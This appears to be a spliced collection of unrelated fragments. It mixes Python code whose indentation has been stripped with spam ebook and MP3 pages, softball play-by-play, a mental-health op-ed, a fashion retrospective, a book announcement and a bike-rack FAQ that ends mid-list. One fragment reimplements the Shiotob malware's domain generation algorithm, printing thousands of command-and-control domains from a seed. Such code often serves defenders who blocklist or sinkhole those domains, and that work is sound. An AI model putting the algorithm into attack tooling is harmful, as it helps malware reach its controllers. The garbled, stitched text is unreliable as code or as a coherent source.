while xbmc.getInfoLabel('Container.PluginName') == id[2] and xbmc.getInfoLabel('Container.FolderPath') != "plugin://%s/" % id[2] and id[2] in xbmc.getInfoLabel('Container.FolderPath'):
xbmc.sleep(250)
if xbmc.getInfoLabel('Container.FolderPath') == "plugin://%s/" % id[2] or id[2] not in xbmc.getInfoLabel('Container.FolderPath'):
break
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink)
def onPlayBackEnded(self):
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink)
def onPlayBackStopped(self):
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink) |
Knowledge of solid state electronics, the operational design of circuits, and electronic testing equipment. Knowledge of digital technology. Knowledge of state and federal two-way radio regulations.... Ebook Free , by David Rutledge The Electronics of Radio (Pap/Dskt) [Paperback]From Cambridge University Press. Never ever doubt with our deal, due to the fact that we will certainly consistently provide just what you require.
Electronics World. Elks Magazine. Elle. the Official Publication of the Soo Line Historical & Technical Society Archives. Newsletter / Milwaukee Area Radio... 14/09/2007 · It is called "The Science of Radio" by Paul J. Nahin (who has written a couple of other interesting books). In fact, David Rutledge, the author of "The Electronics of Radio" mentions this book in his introduction -- of course, it is obvious that they have similar titles. |
import numpy as np
from numpy import loadtxt as loadtxt
from numpy import asarray as arr
from numpy import asmatrix as mat
from numpy import atleast_2d as twod
from scipy.linalg import sqrtm
################################################################################
## Methods for creating / sampling synthetic datasets ##########################
################################################################################
def data_gauss(N0, N1=None, mu0=arr([0, 0]), mu1=arr([1, 1]), sig0=np.eye(2), sig1=np.eye(2)):
"""Sample data from a two-component Gaussian mixture model.
Args:
N0 (int): Number of data to sample for class -1.
N1 :(int) Number of data to sample for class 1.
mu0 (arr): numpy array
mu1 (arr): numpy array
sig0 (arr): numpy array
sig1 (arr): numpy array
Returns:
X (array): Array of sampled data
Y (array): Array of class values that correspond to the data points in X.
TODO: test more
"""
if not N1:
N1 = N0
d1,d2 = twod(mu0).shape[1],twod(mu1).shape[1]
if d1 != d2 or np.any(twod(sig0).shape != arr([d1, d1])) or np.any(twod(sig1).shape != arr([d1, d1])):
raise ValueError('data_gauss: dimensions should agree')
X0 = np.dot(np.random.randn(N0, d1), sqrtm(sig0))
X0 += np.ones((N0,1)) * mu0
Y0 = -np.ones(N0)
X1 = np.dot(np.random.randn(N1, d1), sqrtm(sig1))
X1 += np.ones((N1,1)) * mu1
Y1 = np.ones(N1)
X = np.row_stack((X0,X1))
Y = np.concatenate((Y0,Y1))
return X,Y
def data_GMM(N, C, D=2, get_Z=False):
"""Sample data from a Gaussian mixture model.
Builds a random GMM with C components and draws M data x^{(i)} from a mixture
of Gaussians in D dimensions
Args:
N (int): Number of data to be drawn from a mixture of Gaussians.
C (int): Number of clusters.
D (int): Number of dimensions.
get_Z (bool): If True, returns a an array indicating the cluster from which each
data point was drawn.
Returns:
X (arr): N x D array of data.
Z (arr): 1 x N array of cluster ids; returned also only if get_Z=True
TODO: test more; N vs M
"""
C += 1
pi = np.zeros(C)
for c in range(C):
pi[c] = gamrand(10, 0.5)
pi = pi / np.sum(pi)
cpi = np.cumsum(pi)
rho = np.random.rand(D, D)
rho = rho + twod(rho).T
rho = rho + D * np.eye(D)
rho = sqrtm(rho)
mu = mat(np.random.randn(c, D)) * mat(rho)
ccov = []
for i in range(C):
tmp = np.random.rand(D, D)
tmp = tmp + tmp.T
tmp = 0.5 * (tmp + D * np.eye(D))
ccov.append(sqrtm(tmp))
p = np.random.rand(N)
Z = np.ones(N)
for c in range(C - 1):
Z[p > cpi[c]] = c
Z = Z.astype(int)
X = mu[Z,:]
for c in range(C):
X[Z == c,:] = X[Z == c,:] + mat(np.random.randn(np.sum(Z == c), D)) * mat(ccov[c])
if get_Z:
return (arr(X),Z)
else:
return arr(X)
def gamrand(alpha, lmbda):
"""Gamma(alpha, lmbda) generator using the Marsaglia and Tsang method
Args:
alpha (float): scalar
lambda (float): scalar
Returns:
(float) : scalar
TODO: test more
"""
# (algorithm 4.33).
if alpha > 1:
d = alpha - 1 / 3
c = 1 / np.sqrt(9 * d)
flag = 1
while flag:
Z = np.random.randn()
if Z > -1 / c:
V = (1 + c * Z)**3
U = np.random.rand()
flag = np.log(U) > (0.5 * Z**2 + d - d * V + d * np.log(V))
return d * V / lmbda
else:
x = gamrand(alpha + 1, lmbda)
return x * np.random.rand()**(1 / alpha)
def data_mouse():
"""Simple by-hand data generation using the GUI
Opens a matplotlib plot window, and allows the user to specify points with the mouse.
Each button is its own class (1,2,3); close the window when done creating data.
Returns:
X (arr): Mx2 array of data locations
Y (arr): Mx1 array of labels (buttons)
"""
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111, xlim=(-1,2), ylim=(-1,2))
X = np.zeros( (0,2) )
Y = np.zeros( (0,) )
col = ['bs','gx','ro']
def on_click(event):
X.resize( (X.shape[0]+1,X.shape[1]) )
X[-1,:] = [event.xdata,event.ydata]
Y.resize( (Y.shape[0]+1,) )
Y[-1] = event.button
ax.plot( event.xdata, event.ydata, col[event.button-1])
fig.canvas.draw()
fig.canvas.mpl_connect('button_press_event',on_click)
plt.show()
return X,Y
|
Summary of connections information collated from the reference Anatomical studies on the nucleus reticularis tegmenti pontis in the pigmented rat. II. Subcortical afferents demonstrated by the retrograde transport of horseradish peroxidase., authors Torigoe Y, Blanks RH, Precht W., published in J Comp Neurol. |
#coding:utf-8
import zmq
import json
context = zmq.Context()
class Server(object):
def __init__(self, port):
self.server = context.socket(zmq.REP)
self.server.bind("tcp://*:{0}".format(port))
def run(self):
print "ready"
while True:
recv = self.server.recv()
recv_dict = json.loads(recv)
func = recv_dict['func']
arg = recv_dict['arg']
try:
if arg:
return_main = getattr(self, func)(*arg)
else:
return_main = getattr(self, func)()
except Exception, ex:
return_main = None
return_error = str(ex)
else:
return_error = None
finally:
self.server.send(json.dumps({"main": return_main, "error":return_error}))
class AsyncServer(object):
def __init__(self, port):
self.server = context.socket(zmq.PULL)
self.server.bind("tcp://*:{0}".format(port))
def run(self):
print "ready"
while True:
recv = self.server.recv()
recv_dict = json.loads(recv)
func = recv_dict['func']
arg = recv_dict['arg']
try:
if arg:
return_main = getattr(self, func)(*arg)
else:
return_main = getattr(self, func)()
except Exception, ex:
print ex |
Download Free Mp3 Mp3 Download Player All of video/mp3 that appear on this comemp3.com website were found from internet. The WebMaster does not hold any Legal Rights of Ownership on them. We don't save/host this Mp3 Download Player video/mp3 in our hosting. If by anyhow any of them is offensive to you, please Contact Us asking for the removal. |
import argparse
def get_next_domain(domain):
qwerty = 'qwertyuiopasdfghjklzxcvbnm123945678'
def sum_of_characters(domain):
return sum([ord(d) for d in domain[:-3]])
sof = sum_of_characters(domain)
ascii_codes = [ord(d) for d in domain] + 100*[0]
old_hostname_length = len(domain) - 4
for i in range(0, 66):
for j in range(0, 66):
edi = j + i
if edi < 65:
p = (old_hostname_length * ascii_codes[j])
cl = p ^ ascii_codes[edi] ^ sof
ascii_codes[edi] = cl & 0xFF
"""
calculate the new hostname length
max: 255/16 = 15
min: 10
"""
cx = ((ascii_codes[2]*old_hostname_length) ^ ascii_codes[0]) & 0xFF
hostname_length = int(cx/16) # at most 15
if hostname_length < 10:
hostname_length = old_hostname_length
"""
generate hostname
"""
for i in range(hostname_length):
index = int(ascii_codes[i]/8) # max 31 --> last 3 chars of qwerty unreachable
bl = ord(qwerty[index])
ascii_codes[i] = bl
hostname = ''.join([chr(a) for a in ascii_codes[:hostname_length]])
"""
append .net or .com (alternating)
"""
tld = '.com' if domain.endswith('.net') else '.net'
domain = hostname + tld
return domain
if __name__=="__main__":
""" example seed domain: 4ypv1eehphg3a.com """
parser = argparse.ArgumentParser(description="DGA of Shiotob")
parser.add_argument("domain", help="initial domain")
args = parser.parse_args()
domain = args.domain
for i in range(2001):
print(domain)
domain = get_next_domain(domain)
|
Protein Station Almond Fudge Brownie A made with Almond flour , nuts , dark chocolate , high quality whey protein and a secret blend to give you a nutrition bar like no other !
Definitely the best flavor of the Protein Station assortment. Tastes like brownie but is super healthy.
Really happy with taste and nutrition. One of the best protein bar from protein station. |
__docformat__ = "restructuredtext"
class peekable:
"""Make an iterator peekable.
This is implemented with an eye toward simplicity. On the downside,
you can't do things like peek more than one item ahead in the
iterator. On the bright side, it doesn't require anything from
itertools, etc., so it's less likely to encounter strange bugs,
which occassionally do happen.
Example usage::
>>> numbers = peekable(range(6))
>>> numbers.next()
0
>>> numbers.next()
1
>>> numbers.peek()
2
>>> numbers.next()
2
>>> numbers.next()
3
>>> for i in numbers:
... print i
...
4
5
"""
_None = () # Perhaps None is a valid value.
def __init__(self, iterable):
self._iterable = iter(iterable)
self._buf = self._None
def __iter__(self):
return self
def _is_empty(self):
return self._buf is self._None
def peek(self):
"""Peek at the next element.
This may raise StopIteration.
"""
if self._is_empty():
self._buf = self._iterable.next()
return self._buf
def next(self):
if self._is_empty():
return self._iterable.next()
ret = self._buf
self._buf = self._None
return ret
def groupbysorted(iterable, keyfunc=None):
"""This is a variation of itertools.groupby.
The itertools.groupby iterator assumes that the input is not sorted
but will fit in memory. This iterator has the same API, but assumes
the opposite.
Example usage::
>>> for (key, subiter) in groupbysorted(
... ((1, 1), (1, 2), (2, 1), (2, 3), (2, 9)),
... keyfunc=lambda row: row[0]):
... print "New key:", key
... for x in subiter:
... print "Row:", x
...
New key: 1
Row: (1, 1)
Row: (1, 2)
New key: 2
Row: (2, 1)
Row: (2, 3)
Row: (2, 9)
This requires the peekable class. See my comment here_.
Note, you must completely iterate over each subiter or groupbysorted will
get confused.
.. _here:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/304373
"""
iterable = peekable(iterable)
if not keyfunc:
def keyfunc(x):
return x
def peekkey():
return keyfunc(iterable.peek())
def subiter():
while True:
if peekkey() != currkey:
break
yield iterable.next()
while True:
currkey = peekkey()
yield (currkey, subiter())
|
Mallory McArtor doubled down the lf line.
Allie O'Brien doubled down the lf line, RBI; Mallory McArtor scored.
Arends, Taylor , runner left early.
Mehrle, Hannah doubled to right center.
Maliah Fligg singled down the rf line.
Brenna Winn pinch ran for Maliah Fligg.
Maliah Fligg to p for Brenna Winn.
Tang, Hera singled to right field.
Arredondo, Mikaela singled to right field; Tang, Hera advanced to second.
Gauden, Mackenzie reached on a fielder's choice, bunt; Arredondo, Mikaela advanced to third; Tang, Hera out at home p to c.
James, Kenzie reached first on a fielding error by 2b.
Arends, Taylor singled; James, Kenzie advanced to third.
Jess Brooks doubled to left center.
Allie O'Brien doubled to right field.
Haley Jones tripled down the rf line.
Maliah Fligg reached on a fielder's choice, advanced to second on the error; Haley Jones scored on a throwing error by 3b, unearned.
McKee, Anna to p for Clapp, Maggie.
Sara Czachowski pinch hit for Paige Wieland.
Paige Wieland to rf for Sara Czachowski.
Clapp, Maggie to p for McKee, Anna. |
import threadly, time, random
import unittest
clf = 0
llf = 0
def callLF(lf):
# print "CALLED"
lf.setter(True)
def listenFromFuture():
global llf
# print "GotCalled"
llf +=1
def callFromFuture(s):
global clf
# print "GotCalled", s
clf +=1
def listenException():
raise Exception("TEST1")
def callException(s):
raise Exception("TEST1")
class TestFutures(unittest.TestCase):
def test_futureTest1(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
LF2.add_listener(listenFromFuture)
LF2.add_callable(callFromFuture)
LF1.add_listener(listenFromFuture)
LF1.add_callable(callFromFuture)
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
self.assertEquals(2, llf)
self.assertEquals(2, clf)
LF2.add_listener(listenFromFuture)
LF2.add_callable(callFromFuture)
LF1.add_listener(listenFromFuture)
LF1.add_callable(callFromFuture)
self.assertEquals(4, llf)
self.assertEquals(4, clf)
sch.shutdown()
def test_futureCallerExceptions(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF1.add_listener(listenException)
LF1.add_listener(listenException)
LF1.add_callable(callException)
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
sch.shutdown()
def test_futureDoubleSet(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
LF3 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertFalse(LF3.get())
self.assertEquals(10, sch.get_poolsize())
sch.shutdown()
if __name__ == '__main__':
unittest.main()
|
Robert M. Corless and I are pleased to announce the publication of a new graduate textbook in applied mathematics, entitled A Graduate Introduction to Numerical Methods, From the Viewpoint of Backward Error Analysis. The book is currently available in stores.
The book has made the Notable Computing Books and Articles of 2013 list of the ACM Computing Reviews in the "Mathematics of Computing" section. Computing Reviews' Best of 2013 list consists of book and article nominations from their reviewers, Computing Reviews category editors, the editors in chief of journals they cover, and others in the computing community.
The book has also been featured in a positive review by Nick Higham, one of the leader in the field of numerical analysis and applied mathematics.
To access the Matlab and Maple codes used in this book, consult the code repository.
Publisher: Springer. 868 p. 199 illus., 6 illus. in color. ISBN 978-1-4614-8452-3.
It is available as ebook.
The book is available for pre-order at many places, including Springer ($99 USD), Amazon.com ($79.17 USD) and Amazon.ca ($81.63 CAD). Overall, you can find the cheapest copy by using the metasearch engine bookfinder.com. We also encourage people to get a copy for $25 only using Springer's My Copy service.
Contents: Computer Arithmetic & Fundamental Concepts of Computation.- Polynomials and Series.- Rootfinding and Function Evaluation.- Solving Ax = b.- Solving Ax = x.- Structured Linear Systems.- Iterative Methods.- Polynomial and Rational Interpolation.- The Discrete Fourier Transform.- Numerical Integration.- Numerical Differentiation and Finite Differences.- Numerical Solution of ODEs.- Numerical Methods for ODEs.- Numerical Solutions of Boundary Value Problems.- Numerical Solution of Delay DEs.- Numerical Solution of PDEs.
This book provides an extensive introduction to numerical computing from the viewpoint of backward error analysis. The intended audience includes students and researchers in science, engineering and mathematics. The approach taken is somewhat informal owing to the wide variety of backgrounds of the readers, but the central ideas of backward error and sensitivity (conditioning) are systematically emphasized. The book is divided into four parts: Part I provides the background preliminaries including floating-point arithmetic, polynomials and computer evaluation of functions; Part II covers numerical linear algebra; Part III covers interpolation, the FFT and quadrature; and Part IV covers numerical solutions of differential equations including initial-value problems, boundary-value problems, delay differential equations and a brief chapter on partial differential equations. The book contains detailed illustrations, chapter summaries and a variety of exercises as well as some Matlab codes provided online as supplementary material.
Download a preliminary sample of the book!
Corless, R.M. & Fillion, N. (2013). A Graduate Introduction to Numerical Methods, From the Viewpoint of Backward Error Analysis, Springer. |
# Test methods with long descriptive names can omit docstrings
# pylint: disable=missing-docstring
import unittest
import numpy as np
from scipy.sparse import csr_matrix
from Orange.data import Table, Variable
from Orange.preprocess.score import ANOVA, Gini, UnivariateLinearRegression, \
Chi2
from Orange.preprocess import SelectBestFeatures, Impute, RemoveNaNColumns, SelectRandomFeatures
class TestFSS(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.titanic = Table('titanic')
cls.wine = Table('wine')
cls.iris = Table('iris')
cls.auro_mpg = Table('auto-mpg')
def setUp(self):
Variable._clear_all_caches()
def test_select_1(self):
gini = Gini()
s = SelectBestFeatures(method=gini, k=1)
data2 = s(self.titanic)
best = max((gini(self.titanic, f), f) for f in self.titanic.domain.attributes)[1]
self.assertEqual(data2.domain.attributes[0], best)
def test_select_threshold(self):
anova = ANOVA()
t = 30
data2 = SelectBestFeatures(method=anova, threshold=t)(self.wine)
self.assertTrue(all(anova(self.wine, f) >= t for f in data2.domain.attributes))
def test_error_when_using_regression_score_on_classification_data(self):
s = SelectBestFeatures(method=UnivariateLinearRegression(), k=3)
with self.assertRaises(ValueError):
s(self.wine)
def test_discrete_scores_on_continuous_features(self):
c = self.iris.columns
for method in (Gini(), Chi2()):
d1 = SelectBestFeatures(method=method)(self.iris)
expected = \
(c.petal_length, c.petal_width, c.sepal_length, c.sepal_width)
self.assertSequenceEqual(d1.domain.attributes, expected)
scores = method(d1)
self.assertEqual(len(scores), 4)
score = method(d1, c.petal_length)
self.assertIsInstance(score, float)
def test_continuous_scores_on_discrete_features(self):
data = Impute()(self.auro_mpg)
with self.assertRaises(ValueError):
UnivariateLinearRegression()(data)
d1 = SelectBestFeatures(method=UnivariateLinearRegression())(data)
self.assertEqual(len(d1.domain), len(data.domain))
def test_defaults(self):
fs = SelectBestFeatures(k=3)
data2 = fs(Impute()(self.auro_mpg))
self.assertTrue(all(a.is_continuous for a in data2.domain.attributes))
data2 = fs(self.wine)
self.assertTrue(all(a.is_continuous for a in data2.domain.attributes))
data2 = fs(self.titanic)
self.assertTrue(all(a.is_discrete for a in data2.domain.attributes))
class TestRemoveNaNColumns(unittest.TestCase):
def test_column_filtering(self):
data = Table("iris")
data.X[:, (1, 3)] = np.NaN
new_data = RemoveNaNColumns()(data)
self.assertEqual(len(new_data.domain.attributes),
len(data.domain.attributes) - 2)
data = Table("iris")
data.X[0, 0] = np.NaN
new_data = RemoveNaNColumns()(data)
self.assertEqual(len(new_data.domain.attributes),
len(data.domain.attributes))
def test_column_filtering_sparse(self):
data = Table("iris")
data.X = csr_matrix(data.X)
new_data = RemoveNaNColumns()(data)
self.assertEqual(data, new_data)
class TestSelectRandomFeatures(unittest.TestCase):
def test_select_random_features(self):
data = Table("voting")
for k_features, n_attributes in ((3, 3), (0.25, 4)):
srf = SelectRandomFeatures(k=k_features)
new_data = srf(data)
self.assertEqual(len(new_data.domain.attributes), n_attributes)
|
Last Tuesday a shooting occurred at Emerald Park in Eugene, leaving two men dead — one of whom was the shooter — and one severely injured. The shooter has been identified as a former Army veteran, and police have begun to investigate the reasons as to why this shooting occurred.
According to the veteran’s neighbor, the man had severe PTSD, and police confirmed that he had legal troubles since his return from the serving three tours in Iraq. These legal troubles included two counts of unlawful abuse of a firearm ranging back from August 2015.
Found in his home dead from what appears to be a self-inflicted gunshot wound, the former Army veteran has shaken up the local community with everyone asking why such a horrific event could occur — looking for something or someone to place blame on.
Some will question his background, some will question his religion, but many will be too quick to over-simplify their judgements about mental illness.
Mental illness is a source of contention between scientists and mainstream media. One side has the ability to conduct extensive research in order to understand the complexities of the human psyche and reactions to its environment. The other pushes easy-to-believe, harmful propaganda that demonizes issues rather than attempting to fully understand them.
A massively common misconception about mental health illness and disorders such as PTSD, Schizophrenia and Bi-polarism is that they are directly related to violence, and people with these conditions are volatile cocktails waiting to explode. This belief is not the case.
According to scientists all over the globe, mental disorders such as PTSD, schizophrenia and bi-polarism are not nearly as violent as they are portrayed in everyday media.
The news media in every form relishes in the idea of jumping on a story that will immediately grab audiences. It’s hard to blame them for that. It is the goal of media to get the word out to as many people as possible — but what if that word is completely misleading, harmful or flat-out wrong?
The real danger at play is the stigma associated with mental illness. Mass shootings and violent crimes happen — but when the blame is shifted to the mental illness of an individual, instead of taking all factors into account, it results in the demonization of a massive amount of people who are combating disorders that are not violent in almost all cases.
A study released by Jeffrey Swanson and three other prominent psychiatric and psychological scientists stated “Epidemiologic studies show that the large majority of people with serious mental illnesses are never violent.” Often, people who have serious mental illnesses are more likely to be the victim of a violent attack rather than the aggressor. The study shows that association with gun violence and mentally ill people is the result of suicide.
This shouldn’t come as a surprise. These people are having to exist in a world that has developed shallow, demonizing labels in a form of pseudo-bullying that claims their “kind” are responsible for mass shootings, deaths and tragedy that a majority of us would never think to commit in the first place.
Every time the news and social media portray mental disorders as violent, unpredictable and dangerous it becomes a counterproductive measure to rehabilitation and further postpones our understanding on how to treat these disorders. If the community does not attempt to become more educated, the stigma on mental illness will continue to jeopardize the treatment of those suffering. |
#! /usr/bin/env python
###############################################################################
##
## GINKGO Biogeographical Evolution Simulator Post-Processing Library.
##
## Copyright 2009 Jeet Sukumaran and Mark T. Holder.
##
## This program is free software; you can redistribute it and#or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program. If not, see <http:##www.gnu.org#licenses#>.
##
###############################################################################
"""
Package setup and installation.
"""
import ez_setup
ez_setup.use_setuptools()
from setuptools import setup
from setuptools import find_packages
from ginkgo import PACKAGE_VERSION
import sys
import os
import subprocess
script_names = ['ginkgo-ascii-grid.py', 'ginkgo-grid-coordinates.py']
setup(name='Ginkgo',
version=PACKAGE_VERSION,
author='Jeet Sukumaran and Mark T. Holder',
author_email='[email protected] and [email protected]',
url='',
description="""\
A library to faciliate setting up runs and processing results of the GINKGO Biogeographical Evolution Simulator""",
license='GPL 3+',
packages=['ginkgo'],
package_dir={'ginkgo': 'ginkgo'},
package_data={
"" : ['doc/*'],
"ginkgo" : ["tests/data/*"]
},
scripts = [('scripts/%s' % i) for i in script_names],
test_suite = "ginkgo.tests",
include_package_data=True,
zip_safe=True,
install_requires=[
"DendroPy >= 3.0.0",
],
entry_points="""
# -*- Entry points: -*-
""",
long_description=open('README.txt', 'rU').read(),
classifiers = [
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: GNU General Public License (GPL)",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Bio-Informatics",
],
keywords='phylogenetics evolution biology biogeography',
)
|
We’ve been hard at work tending to our Projects In Place beehives! There are the supers we fabricated at the ING booth at the EPIC Sustainability Fair. Thanks again to everyone who helped out. The bees are doing great!
Having fun building our first beehive. Thanks to all of those who came to Epic and gave us hand! |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-21 11:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('core', '0012_auto_20180121_1155')
]
operations = [
migrations.CreateModel(
name='Extract',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_name', models.CharField(max_length=30, verbose_name='Name')),
('date', models.DateField(verbose_name='Date')),
('money', models.DecimalField(decimal_places=2, max_digits=12, verbose_name='Money')),
('description', models.CharField(max_length=70, verbose_name='Description')),
('category', models.CharField(max_length=70, verbose_name='Category')),
('payment', models.CharField(max_length=70, verbose_name='Payment')),
],
options={
'ordering': ['-date'],
},
),
]
operations = [
migrations.SeparateDatabaseAndState(state_operations=operations)
]
|
With sci-fi imperial armored apparel, Gareth Pugh enables clients to roam planet earth with superb confidence. Live art in motion “the lovely Daphne Guinness” is an avid fan of Gareth Pugh. For her exhibit at the FIT Museum, she carefully chose pieces from Gareth Pugh’s collections, most notably a remarkable spiked-leather cat-suit from Fall 2009.
Pugh continually amazes fans with his trademark monochrome prints, geometrically cut stripe patterns, (his use of latex, sheer plastic and leather) and ultra-luxe voluminous fabric design. It brings me great pleasure to present Gareth Pugh, present to 2007.
SPRING 2012: A pleasant display of window-blinds effect dresses, vests and jackets and caged garments.
FALL 2011: Spring 2011 reminiscence of exoskeleton suits and vibrant metallic stripes.
SPRING 2011: Marvelous exoskeleton suits, sheer dresses and tapered blazers.
FALL 2010: Domineering leather bandage dress. A magnificent floor-length draped long-sleeve shirt paired with shiny pants. Provocative striped cowl-neck sheer tunic dress. Demure leather-n-wool train dress. Chain dresses and pants bear a nostalgic resemblance to The Maid of New Orléans (Joan of Arc) and an attractively New Age long crochet cardigan.
SPRING 2010: Zipper-embellished vests and jackets with elongated tails and rebelliously futuristic shredded dresses.
FALL 2009: Glorious leather-spiked assembles mixed with Helmut Lang idealism.
SPRING 2009: Unparallel texture and visual effects.
FALL 2008: Ode to Japanese Samurai armor. Mongolian ruler Genghis Kahn gets a feminized makeover.
SPRING 2008: Alluring to the eyes as a multifaceted deep-sea creäture are the sparkles that hug this lycra ribbed dress.
FALL 2007: A mirrored patent-leather dress is “melancholically romantic” to the likes of Alexander McQueen.
SPRING 2007: Alice in Wonder Land meets Alexander McQueen in this cowl-neck checkered dress.
VERSACE (Metal-Heeled Leather Ankle Boots): The spirit of Gareth Pugh in a pair of leather boots that compliment skinny trousers, stove-pipe jeans, leather or latex jeggings, wool or cashmere sweaters, long cardigans, draped jerseys or racer-back tunics. |
from lib.sino import db
import lingpyd as lingpy
numbersup = '¹²³⁴⁵⁶⁰'
numbersdown = '₁₂₃₄₅₆₀'
for k in db:
subgroup = db[k,'subgroup']
if subgroup == 'Bai':
# modify tokens
tks = db[k,'tokens']
if tks not in ['-','']:
tks = tks.split(' ')
ntk = []
while tks:
tk = tks.pop(0)
if tk[0] in numbersdown:
for a,b in zip(numbersdown,numbersup):
tk = tk.replace(a,b)
ntk += [tk]
# expand nasals
elif "\u0303" in tk or tk[0] in "ãũẽĩõ":
ntk += [tk,lingpy.rc('nasal_placeholder')]
else:
ntk += [tk]
db[k][db.header['tokens']] = ' '.join(ntk)
# same for ipa
ipa = db[k,'ipa']
for a,b in zip(numbersdown, numbersup):
ipa.replace(a,b)
db[k][db.header['ipa']] = ipa
db._clean_cache()
# assemble cognate ids and align them again for bai
alms = {}
etd = db.get_etymdict(ref='cogid')
for k in etd:
print ("Carrying out alignment for {0}".format(k))
idxs = [idx[0] for idx in etd[k] if idx]
nidxs, alms = [], []
for idx in idxs:
alm = db[idx,'tokens']
sbg = db[idx,'subgroup']
if alm != '-' and alm and sbg=='Bai':
nidxs += [idx]
alms += [alm]
if alms:
msa = lingpy.Multiple(alms)
msa.lib_align()
for idx,alm in zip(nidxs,msa.alm_matrix):
db[idx][db.header['alignment']] = ' '.join(alm)
cidx = db._rowIdx
ignore = []
for k in db:
c = db[k, 'concept']
if c == 'to plant (grow)':
db[k][cidx] = 'to plant'
elif c == 'lie, rest':
if db[k,'ipa'] == '-' or db[k,'ipa'] == '':
ignore += [k]
elif c == 'to the dream':
db[k][cidx] = 'the dream'
elif c == 'to suck':
if db[k,'ipa'] == '-' or db[k,'ipa'] == '':
db[k][cidx] = 'to lick'
elif c == 'to work':
db[k][cidx] = 'the work'
# search for potential duplicates
dups = {}
for d in db.doculect:
# get data flat
idxs = db.get_list(doculect=d, flat=True)
tks = db.get_list(doculect=d, flat=True, entry='tokens')
# iterate over all tokens and search for identical words
dup = {}
for idx,tk in zip(idxs,tks):
if tk not in ['-','']:
try:
dup[tk] += [idx]
except KeyError:
dup[tk] = [idx]
for k in dup:
if k not in ['-','']:
if len(dup[k]) > 1:
basei = dup[k][0]
basec = db[basei,'concept']
base = '{0} ({1})'.format(basei, basec)
for idx in dup[k][1:]:
dups[idx] = base
for k in db:
if k not in dups:
dups[k] = ''
if db[k,'ipa'] == '0':
db[k][db.header['ipa']] = ''
db[k][db.header['tokens']] = ''
db.add_entries('duplicates', dups, lambda x: x)
# add line for duplicates
db.update('sinotibetan',verbose=True, delete=ignore)
|
Have a question about our Steadyrack vertical bike racks, shipping, returns, warranty policies or something else? You’ll most likely find the answer here, however for all other concerns and enquiries please get in touch with our Support team at [email protected].
Do all the racks pivot?
Yes – all of our racks pivot almost 160 degrees on the wall.
What is the function of the rear wheel bracket/rest?
The rear wheel rest/bracket is designed to universally work with all tyre widths, including fat tyres. Narrow tyres will generally sit deeper in the bracket (more so than wider tyres). Your tyre is only required to have partial contact with the rest for it to perform its function and prevent the bike from swinging from side to side. We designed the rear wheel rest/bracket to complement the design of our racks and we felt that a larger rest/bracket wasn’t necessary.
Why doesn’t my Steadyrack bike rack swivel/pivot easily?
Our bike racks can be quite stiff when you use them for the first few times. They should loosen after some use however if you find that they are still not pivoting as required, you can follow this procedure. Steadyrack bike racks are assembled using a specific torque setting for the nuts that hold the central spine to the top and bottom mounting brackets. This setting is designed to give sufficient tension to the pivot to ensure bikes can be loaded on any angle without the rack moving around excessively. When you remove the 2 plastic caps from the top and bottom, these nuts will become exposed. You can loosen both nuts and it will free up the rack’s movement. Equally, you can tighten them to lock the rack into position. This is due to the type of fibre washers we use to assist with the stiffening affect.
Does the bike rack need to be at 90° to the wall when mounting & dismounting my bike?
No – you can load and unload your bike from our racks at various angles on the wall. Be sure that you simply line your bike up with the angle of the rack before pushing it in.
What colours do your bike racks come in?
Our Classic, Fender and Fat Racks all come in black only, however you can customise your rack using our wide range of coloured End Caps.
Can I lock my Steadyrack so that it stays in one position?
No – however it is possible to restrict the movement of the pivot. Simply remove the 2 end caps and tighten the 2 nuts that attach the central pivot bar to the mounting brackets. Be careful doing this, making sure that your fixings are secure, as any pressure sideways will put extreme pressure on the mounting bracket fixings.
Will your bike racks work for small children’s bikes?
The smallest diameter wheels we recommend are 16 inches. Any smaller and the tyres won’t contact the two V shaped cradling points in the rack – the forks will actually rest on the bars before the tyres connect with them making the distance between the two V’s a bit too much. We have had a bit of success with placing some Velcro straps on the bottom arm to shorten the distance between the 2 points, but the bikes are not as stable, and you would need to strap the wheel to the upper arm of the rack with Velcro as well.
Is there any downside to using the Fender Rack versus the Classic Rack?
The only difference between these two racks is the fact that the Fender Rack will work for both types of bikes. There are two main reasons people choose the Classic over the Fender if they don’t have a bike with a fender; the first is security, as the plastic saddles are easier to cut which is a potential problem in exposed environments. The second is price, as the Fender Rack is slightly more expensive.
What are your racks made from?
Our racks are made from steel and UV treated plastic.
Can I mount your bike racks onto the side of a van?
Yes – we use our racks for transporting bikes in a trailer to and from events so this should work in the same way for a van. We tie the bikes down with Velcro straps and then fold them over the top of each other. We also wrap a long bungy cord across them so they don’t move around too much. They travel really well cushioned by the front tyre and as long as you don’t have any metal to metal contact you shouldn’t have any issues.
Can I hang my bike in a Steadyrack by its rear wheel, not the front wheel?
